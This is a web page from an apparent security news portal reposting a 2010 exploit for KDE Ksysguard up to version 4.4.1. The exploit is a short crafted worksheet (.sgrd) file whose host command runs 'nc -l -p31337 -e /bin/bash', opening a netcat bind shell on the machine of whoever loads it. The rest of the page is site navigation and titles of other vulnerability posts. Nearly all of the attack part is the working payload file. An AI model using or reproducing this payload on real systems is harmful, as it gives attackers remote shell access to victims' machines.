is an hourly updated security news portal
Thursday September 9th 2010

Tags

News.dreamings.org

News.dreamings.org is an hourly updated security news portal with a focus on virus internet security network computer and information.

http://www.dreamings.org

Who's Online

6 visitors online now
6 guests, 0 members

KDE <= 4.4.1 Ksysguard RCE via Cross Application Scripting

# Exploit Title: Ksysguard RCE via Cross Application Scripting
# Date: 2010 03 20
# Author: Emanuele 'emgent' Gentili
# Code: http://www.backtrack.it/~emgent/exploits/20100320_Ksysguard_RCE_CAS.txt
# Version: <= 4.4.1
# CVE : N/A
# Vendor: http://www.kde.org
# Video: http://www.backtrack.it/~emgent/videos/16032010_-_SecuritySummit_CAS_OWNING_KDE.mov
# About CAS: http://en.wikipedia.org/wiki/Cross_Application_Scripting
#            http://it.wikipedia.org/wiki/Cross_Application_Scripting
halfapple:~ emanuelegentili$ cat ph33r.sgrd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="She" interval="2" locked="0" rows="2" columns="2" >
<host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet>
halfapple:~ emanuelegentili$
Post Published: 20 March 2010
Author: Georges Kut
Found in section: Bugtraq

Tags:

Previous Topic:
Next Topic:

Social Links

Latest Topics

Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities Adobe »

Title: Adobe Shockwave Player 11.5.6.606...

Joomla Custom PHP Pages Component com_php LFI Vulnerability Joomla Custom »

Joomla Custom PHP Pages Component LFI...

Joomla Component XOBBIX [prodid] SQL Injection Vulnerability Joomla »

...

Recent Comments